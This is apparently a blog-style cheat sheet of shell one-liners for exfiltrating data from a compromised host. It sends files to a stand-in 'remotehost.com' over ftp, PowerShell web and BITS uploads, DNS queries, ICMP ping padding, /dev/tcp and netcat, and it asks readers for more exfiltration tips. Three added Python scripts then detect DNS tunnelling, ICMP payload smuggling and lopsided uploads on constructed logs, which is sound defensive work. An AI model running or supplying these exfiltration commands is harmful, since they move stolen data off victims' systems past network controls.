Native / Noninteractive Exfiltration Ideas

Pulled the following from various resources (big shoutout to commandlinekungfu.com): a collection of one-liners and non-interactive commands to exfiltrate data when all you have is a shell. Note: with the Windows PowerShell commands, if you have too many quotation marks and they break the statement, try encoding the statement as base64 and executing it with -encodedCommand. If you can't go interactive, you can try writing each line of the activity to a file, then passing that file as input to the executable; this works well for interactive ftp, for example. Make sure to stop back over time, as this page is a work in progress. Enjoy, and add your best exfiltration tips in the comments!

On Windows:

Using ftp (the script-file approach mentioned above; note that cmd.exe chains commands with &, not ;):
echo open remotehost.com 8443 > ftp.dat & echo user myuser>> ftp.dat & echo password1>> ftp.dat & echo bin>> ftp.dat & echo put localfile.txt>> ftp.dat & echo quit>> ftp.dat & ftp -n -s:ftp.dat

Using a windows share:

net use * \\remotehost.com\myshare password1 /user:myuser

Using powershell and BITS to upload to an IIS server:

powershell -noprofile -noninteractive -executionpolicy bypass -command import-module bitstransfer; start-bitstransfer -displayname BITS -source "localfile.txt" -destination http://remotehost.com/serverdir/remotefile.txt -transfertype upload

Powershell upload to a webserver:
powershell -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""http://remotehost.com/serverdir"""; $filepath="""C:\master.zip"""; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server,$filepath);"

Using powershell to send an email:
powershell -noprofile -noninteractive Send-MailMessage -to "emailaddress" -from "emailaddress" -subject "Subject" -Attachments "attachment file path" -body "Body" -SmtpServer remotehost.com

Using powershell to send over dns queries (each line of the file is looked up as a name, with remotehost.com acting as the DNS server; inner quotes must be single quotes or the outer string breaks):
powershell -executionpolicy bypass "Get-Content 'localfile.txt' | ForEach-Object { nslookup $_ remotehost.com }"

On *nix:

With rsync:

rsync -aH localfolder remotehost.com:/path/name

Curl over ftp:

curl -T localfile.txt ftp://remotehost.com --user myuser:password1

Tar to ssh (ssh does not accept a user:password@host form; it prompts for the password):

tar zcf - localfolder | ssh myuser@remotehost.com "cd /path/name; tar zxpf -"

Tar to curl over https:
tar zcf - localfolder | curl -F "data=@-" https://remotehost.com/script.php

Tar to base64 to a network pipe (/dev/tcp is a bash built-in pseudo-device, not available in sh/dash):
tar zcf - localfolder | base64 >/dev/tcp/remotehost.com/8443

Tar to dns queries:
tar zcf - localfolder | xxd -p -c 16 | while read line; do host $line.domain.com remotehost.com; done

Raw to dns queries:
LINE=`cat localfile.txt`; domain="remotehost.com";while read -r -n 1 char;do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var};while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}".$domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53 0>&1;unset var;unset var2
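The three DNS variants on this page (the nslookup loop in the Windows section, the tar | xxd loop and the printf one-liner) share one shape: file content becomes hex labels inside query names, and the queries themselves are the channel. As an added, defender-side example that is not from the original post or from commandlinekungfu.com, the Python script below scores a resolver's query log for that shape: long all-hex or high-entropy labels, the number of such queries per registered domain, the bytes they carry, and the "theend" marker the printf variant sends last. The log layout (a simplified BIND "query:" line), the addresses and the hex chunks are constructed. One caveat a practitioner should keep in mind: the nslookup variant sends its queries straight to remotehost.com as the resolver, so it never appears in the internal resolver's log; that one is caught at the network edge as port-53 traffic to hosts other than the sanctioned resolvers.

```python
import math
import re
from collections import defaultdict

# Constructed sample query-log lines in a simplified BIND "query:" layout (hypothetical
# traffic, not from the original post). The remotehost.com names mimic the
# "$RANDOM.$offset.<hex>.domain" shape of the printf one-liner (ending in its "theend"
# marker); the domain.com names mimic the 32-hex-char labels of the tar | xxd one-liner.
SAMPLE_LOG = """\
client 10.0.0.5#51234: query: 17821.0.536563726574207265706F72743A20513320726573756C74732C20636F6E.remotehost.com IN A
client 10.0.0.5#51235: query: 29011.60.666964656E7469616C0A.remotehost.com IN A
client 10.0.0.5#51236: query: 8812.theend.remotehost.com IN A
client 10.0.0.5#51237: query: 1f8b0800000000000003edcdb10a8030.domain.com IN A
client 10.0.0.5#51238: query: 4c0c8f57d0c1b8b2b4a0f4d7c2d4bed4.domain.com IN A
client 10.0.0.5#51239: query: a3f1e2d4c5b6a798fedcba9876543210.domain.com IN A
client 10.0.0.7#40001: query: www.example.com IN A
client 10.0.0.7#40002: query: mail.example.com IN MX
"""

HEX_LABEL = re.compile(r"^[0-9A-Fa-f]{16,63}$")   # 8+ bytes of hex in one label
QUERY_RE = re.compile(r"client (\S+?)#\d+: query: (\S+) IN (\S+)")


def shannon_entropy(s):
    """Bits per character; hex tops out near 4, base64 near 6, English words well below."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_query_log(text):
    """Return (client, qname, qtype) tuples from the simplified query-log lines."""
    out = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            out.append((m.group(1), m.group(2).rstrip("."), m.group(3)))
    return out


def registered_domain(qname):
    """Crude registered-domain split (last two labels); a public-suffix list is better."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def label_looks_encoded(label):
    """Long all-hex label, or a long label whose entropy is closer to encoding than to words."""
    if HEX_LABEL.match(label):
        return True
    return len(label) >= 20 and shannon_entropy(label) > 3.5


def score_queries(queries, min_encoded=2):
    """Group queries by registered domain; return the domains that received at least
    min_encoded queries carrying encoded-looking subdomain labels, with supporting stats."""
    per_domain = defaultdict(lambda: {"queries": 0, "encoded": 0, "bytes": 0,
                                      "clients": set(), "end_marker": False})
    for client, qname, _qtype in queries:
        dom = registered_domain(qname)
        sub = qname.split(".")[:-2]
        st = per_domain[dom]
        st["queries"] += 1
        st["clients"].add(client)
        encoded = [l for l in sub if label_looks_encoded(l)]
        if encoded:
            st["encoded"] += 1
            # hex labels carry half their length in payload bytes
            st["bytes"] += sum(len(l) // 2 for l in encoded if HEX_LABEL.match(l))
        if "theend" in sub:
            st["end_marker"] = True
    return {d: s for d, s in per_domain.items() if s["encoded"] >= min_encoded}


if __name__ == "__main__":
    for dom, st in score_queries(parse_query_log(SAMPLE_LOG)).items():
        print(dom, st["encoded"], "encoded queries,", st["bytes"], "bytes,",
              "clients:", sorted(st["clients"]), "end marker:", st["end_marker"])
```

Tune min_encoded and the entropy threshold against a baseline of your own resolver's traffic: CDN and anti-spam lookups also produce long hashed labels, so the count of distinct encoded names per domain per client over a window is the signal, not any single query.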

Tar to data over icmp (Linux iputils ping: -p takes up to 16 pad bytes in hex, which is why xxd is told to emit 16 bytes per line):
tar zcf - localfolder | xxd -p -c 16 | while read line; do ping -p $line -c 1 -q remotehost.com; done
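The ping loop above carries 16 bytes per echo request in the -p padding; on Linux iputils ping the pad bytes are repeated to fill the payload and a timestamp is written over the front, whereas a stock ping fills the payload with incrementing bytes. As an added, defender-side example that is not part of the original post, the following Python script inspects raw ICMP echo requests, separates the stock incrementing payload from a repeated pad pattern, and reassembles the carried bytes in sequence order, which is what an analyst does with a packet capture to establish what actually left the network. The payload layout modelled in build_echo (a 16-byte timestamp followed by the pattern) and the sample chunks are assumptions and constructed data; feed inspect_echo the ICMP bytes your capture tool extracts.

```python
import struct


def icmp_checksum(data):
    """RFC 1071 one's-complement checksum; zero when run over a message with a valid checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(ident, seq, pad=None, datalen=56, ts=(1700000000, 123456)):
    """Constructed echo request. Assumed model of the iputils layout: data[i] = i & 0xff by
    default, or the -p pattern repeated cyclically; a 16-byte timeval overwrites the front."""
    if pad is None:
        data = bytes(i & 0xFF for i in range(datalen))
    else:
        data = bytes(pad[i % len(pad)] for i in range(datalen))
    data = struct.pack("<QQ", *ts) + data[16:]
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = icmp_checksum(header + data)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + data


def smallest_period(buf, max_period=16):
    """Smallest p <= max_period such that buf repeats every p bytes, or None."""
    for p in range(1, max_period + 1):
        if len(buf) >= 2 * p and all(buf[i] == buf[i - p] for i in range(p, len(buf))):
            return p
    return None


def inspect_echo(msg):
    """Classify one ICMP message; None for anything but a well-formed echo request."""
    if len(msg) < 8 + 16:
        return None
    mtype, _code, _csum, _ident, seq = struct.unpack("!BBHHH", msg[:8])
    if mtype != 8 or icmp_checksum(msg) != 0:
        return None
    data = msg[8:]
    tail = data[16:]                                   # skip the timestamp region
    is_default = all(tail[k] == (16 + k) & 0xFF for k in range(len(tail)))
    pad = None
    period = smallest_period(tail)
    if not is_default and period is not None:
        # the pattern started at data offset 0, so the tail begins at pattern index 16 % period
        off = 16 % period
        block = tail[:period]
        pad = block[period - off:] + block[:period - off] if off else block
    return {"seq": seq, "default": is_default, "pad": pad}


def recover_pad_stream(messages):
    """Concatenate the pad bytes of non-default echo requests in sequence order."""
    carried = [(r["seq"], r["pad"]) for r in map(inspect_echo, messages)
               if r and r["pad"] is not None]
    return b"".join(p for _, p in sorted(carried))


# Constructed capture: one stock ping, then three requests carrying 16-byte chunks of
# SECRET the way `xxd -p -c 16` feeding `ping -p` would, delivered out of order.
SECRET = b"constructed sample: not real data"
CHUNKS = [SECRET[i:i + 16] for i in range(0, len(SECRET), 16)]


def build_sample_capture():
    msgs = [build_echo(0x1234, 1)]
    msgs += [build_echo(0x1234, 2 + n, pad=c) for n, c in enumerate(CHUNKS)]
    return [msgs[0], msgs[1], msgs[3], msgs[2]]


if __name__ == "__main__":
    capture = build_sample_capture()
    for m in capture:
        print(inspect_echo(m))
    print(recover_pad_stream(capture))
```

A single odd payload is weak evidence on its own (some monitoring tools also set custom pad bytes); the stronger signal is a host emitting many echo requests whose pad pattern changes on every packet, which never happens with a normal ping.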

NetCat over random port:
cat localfile.txt | nc remotehost.com 8443
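Everything else on this page (the ftp script, the share mapping, the BITS and WebClient uploads, rsync, curl, tar over ssh, the /dev/tcp and nc writes) is a bulk push over an allowed outbound connection, and the common tell is volume: far more bytes leaving a host than coming back. As an added, defender-side example that is not part of the original post, this Python script reads simplified Zeek conn.log-style records (constructed here, with the documentation ranges 203.0.113.0/24 and 198.51.100.0/24 standing in for external hosts) and flags internal-to-external pairs with a large, lopsided upload regardless of the port used. The field subset, the RFC 1918 internal ranges and the thresholds are assumptions to tune for your own network.

```python
import ipaddress
from collections import defaultdict

# Constructed, simplified Zeek conn.log-style records (tab separated; not real traffic):
# ts  orig_h  orig_p  resp_h  resp_p  proto  service  orig_bytes  resp_bytes
SAMPLE_CONN = """\
1700000000.1\t10.0.0.5\t51000\t203.0.113.10\t8443\ttcp\t-\t52428800\t0
1700000010.2\t10.0.0.5\t51001\t203.0.113.10\t21\ttcp\tftp\t1800\t900
1700000011.3\t10.0.0.5\t51002\t203.0.113.10\t20\ttcp\tftp-data\t10485760\t0
1700000020.4\t10.0.0.7\t52000\t198.51.100.20\t443\ttcp\tssl\t4200\t310000
1700000030.5\t10.0.0.7\t52001\t10.0.0.9\t445\ttcp\tsmb\t73400320\t12000
1700000040.6\t10.0.0.8\t53000\t198.51.100.40\t22\ttcp\tssh\t26214400\t81920
"""

FIELDS = ["ts", "orig_h", "orig_p", "resp_h", "resp_p", "proto", "service",
          "orig_bytes", "resp_bytes"]
# Assumed internal address space (RFC 1918); adjust to the real allocation.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_conn(text):
    """Parse the tab-separated records into dicts with numeric byte and port fields."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            continue
        row = dict(zip(FIELDS, parts))
        for key in ("orig_p", "resp_p", "orig_bytes", "resp_bytes"):
            row[key] = int(row[key])
        rows.append(row)
    return rows


def is_internal(ip):
    """True for addresses inside the assumed internal ranges (not ipaddress.is_private,
    which also counts the documentation ranges used in the sample as private)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def find_uploads(rows, min_bytes=1 << 20, min_ratio=10.0):
    """Aggregate outbound bytes per (internal source, external destination) and flag pairs
    that pushed at least min_bytes with an upload:download ratio of at least min_ratio."""
    agg = defaultdict(lambda: {"orig_bytes": 0, "resp_bytes": 0, "ports": set(),
                               "services": set(), "connections": 0})
    for r in rows:
        if not is_internal(r["orig_h"]) or is_internal(r["resp_h"]):
            continue                                   # only internal -> external flows
        a = agg[(r["orig_h"], r["resp_h"])]
        a["orig_bytes"] += r["orig_bytes"]
        a["resp_bytes"] += r["resp_bytes"]
        a["ports"].add(r["resp_p"])
        a["services"].add(r["service"])
        a["connections"] += 1
    flagged = {}
    for key, a in agg.items():
        ratio = a["orig_bytes"] / (a["resp_bytes"] + 1)
        if a["orig_bytes"] >= min_bytes and ratio >= min_ratio:
            a["ratio"] = round(ratio, 1)
            flagged[key] = a
    return flagged


if __name__ == "__main__":
    for (src, dst), a in find_uploads(parse_conn(SAMPLE_CONN)).items():
        print(f"{src} -> {dst}: {a['orig_bytes']} bytes out over ports {sorted(a['ports'])}, "
              f"ratio {a['ratio']}")
```

The byte ratio is what makes this port-agnostic: the 8443 raw socket, the ftp data channel and the ssh session all show the same lopsided profile, while an ordinary HTTPS download does not. The DNS and ICMP channels are far too low-volume for a byte threshold and need content inspection of the queries and payloads instead.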